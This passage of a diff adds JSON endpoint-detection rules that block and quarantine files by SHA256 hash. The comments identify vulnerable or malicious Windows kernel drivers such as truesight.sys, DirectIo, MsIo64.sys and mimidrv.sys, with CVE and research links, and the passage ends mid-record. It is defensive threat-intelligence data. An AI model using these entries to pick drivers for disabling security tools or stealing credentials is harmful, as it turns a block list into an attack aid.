+} +{ + "id": "d640a694-1b9a-5cfc-a204-173629b14aae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149006Z", + "creation_date": "2026-03-23T11:45:31.149009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149017Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"77260b530b6da96800832d1b3192aced006d2c9ad5cc89227e060ddaae7ea32a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d654ce02-481d-547e-b2c0-06bc5af2318b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499984Z", + "creation_date": "2026-03-23T11:45:31.499987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499995Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e84ee3a620bcbbc803c063f817482f79a1b2706ca4576b091d8c970a99a13a4b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d659f295-640e-54dd-8166-22be7c09a18c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622527Z", + "creation_date": "2026-03-23T11:45:29.622529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bc3685b0b8adc97931b5d31348da235cd7581a67edf6d79913e6a5709866135", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6672950-b0f6-514a-89c0-663789a4039c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979186Z", + "creation_date": "2026-03-23T11:45:29.979188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a2ae6439381ea2aa3116df7025cbb5c6c7c07cc8d19508e6021e4d6177a565", + "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) 
[https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d66c7766-ac85-5795-9dd6-df5842317d2c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823580Z", + "creation_date": "2026-03-23T11:45:31.823583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "659060d15fc1fc553cb80225b237919a686914f7590b989e10fb72ed9938930b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d673273a-c871-5b8d-9d2e-4286ec032beb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151090Z", + "creation_date": 
"2026-03-23T11:45:31.151092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d7043b497c802662a026c9c9f90941cbc5355aec498a8955a8e03fa2f85af1c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6741839-f890-5333-a8a5-429a98d886a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824983Z", + "creation_date": "2026-03-23T11:45:30.824987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c823e63427821411c03f3d8706d08a456352b9c9e34340adb2a3c3e34742229c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "d674455d-d9e0-58dc-be7c-e8562562c1a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149844Z", + "creation_date": "2026-03-23T11:45:31.149846Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149852Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3b183048baf9ead5313607e82e599c973838d9ef4099dcafd11b123c0bb62201", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d67a44ea-f60b-5a3d-84da-36782e7ea480", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985630Z", + "creation_date": "2026-03-23T11:45:29.985632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330", + "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d681726d-1982-5f87-a990-65e10c4729ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145036Z", + "creation_date": "2026-03-23T11:45:31.145038Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145043Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3aebda5c4cf4decc4b2d87e9662d7f0df2b84795d341511ddf5e015f23f96a6b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6886abc-6dc8-5e14-a44a-23df35b29746", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614266Z", + "creation_date": "2026-03-23T11:45:29.614268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bf00eff58e5bbe4cf578ec37b9e13c8fa74511fb2644352fcc091347153a709", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d688ffe5-f2a6-5e06-852e-a4d396eecf70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481455Z", + "creation_date": "2026-03-23T11:45:31.481458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481468Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "d0db7c736c1e7db87e28cae1b7a36e74f502a9f719ff28308cbce184c8426a51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d68ab78c-a7e2-58f8-bb64-af8b9ec2312b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151679Z", + "creation_date": "2026-03-23T11:45:31.151682Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4337c501957262ec0285860e07d7d2c94f2dffb0df9cf41597162cc9d2cf89ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6ce4e88-26be-5f83-9c5f-84c58436b13e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468773Z", + "creation_date": "2026-03-23T11:45:30.468776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468785Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b5206b5928e03929cca1eda3f12e6df14b31f80e8c16c1bb29109c072053b90", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6ce8f92-23cc-58f5-92e7-841970f524c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492730Z", + "creation_date": "2026-03-23T11:45:31.492733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492742Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ae7329aa54c405421b8ee778dd6e20f8058bd137eae79b2acd20d89fca273d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6d3e514-c6a8-5eed-9c09-6cdb5c956e24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156938Z", + "creation_date": "2026-03-23T11:45:31.156940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156952Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e507b8b6b9fd0275e858d721ba6dd3ce7864a9f4822e97c0cc5338facece8305", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6db1ed1-9f82-52da-961c-d220a7cedc40", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499667Z", + "creation_date": 
"2026-03-23T11:45:31.499670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499679Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "71760362ea4f35cd3fc3b4a3a002f4f5e04f83b20efa81c4b865543ed00240ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6db3855-2fa1-53ed-b829-cacde9330ec3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622892Z", + "creation_date": "2026-03-23T11:45:29.622893Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "38fa9b5b66a11fd7387012c5c4bbd414eca8361273d57dba1e49aa6af23337f3", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6dc7499-f4d1-565f-93b0-d8496a6e3331", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818719Z", + "creation_date": "2026-03-23T11:45:30.818721Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c80a2d3a0ef4ce0a3aec62e9d15b50679dec4cccb69a5c0b72529641ebfa5f4", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6de2e19-8305-5310-b303-bc676760fc01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472230Z", + "creation_date": "2026-03-23T11:45:31.472234Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85a626153de212444496be7c28c61a0a49b672d88de0f3de4794558ec3613d5d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6e429ba-60b2-5eec-9cfd-b3c4f6b95a0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816862Z", + "creation_date": "2026-03-23T11:45:31.816865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0baee4e0bf0c33bab6bba5fb6a644f67a53e58fe66fb98d17a229e39d8a01931", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6e6e0db-492a-5a99-8903-c31c61f6c3ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468824Z", + "creation_date": "2026-03-23T11:45:30.468827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468834Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35d552d7603a26ea7ed111bd865cddaf7aa342481c89af7b2697beb25b99e829", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d6ea952e-ec86-5186-988c-0c30d24a8a23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830580Z", + "creation_date": "2026-03-23T11:45:30.830582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "a9181974503438d60ceac451fe075011f5167ea835a77b650a654b4e34f16497", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d701418c-9f92-5c43-9a27-15015c453755", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459244Z", + "creation_date": "2026-03-23T11:45:30.459247Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459256Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8017e618b5a7aa608cc4bce16e4defd6b4e99138c4ba1bdd6ad78e39f035cf59", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "d70f5fa2-c778-54dc-8814-d6becc0157ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
